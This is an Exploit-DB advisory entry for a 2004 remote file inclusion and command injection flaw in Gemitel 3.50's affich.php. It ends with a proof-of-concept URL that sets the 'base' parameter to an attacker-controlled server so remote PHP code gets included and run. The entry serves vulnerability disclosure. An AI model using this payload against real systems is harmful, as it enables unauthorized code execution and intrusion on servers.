Gemitel 3.50 - '/affich.php' Remote File Inclusion / Command Injection

EDB-ID:

24009


Author:

jaguar

Type:

webapps


Platform:

PHP

Date:

2004-04-15


source: https://www.securityfocus.com/bid/10156/info

A vulnerability has been identified in the handling of input by Gemitel. Because of this, it may be possible for a remote user to gain unauthorized access to a system using the vulnerable software.

It is possible to influence the include path of certain files, which could lead to an attacker including arbitrary PHP files from an external system.

http://www.example.com/[Gemitel folder]/html/affich.php?base=http://[your server]/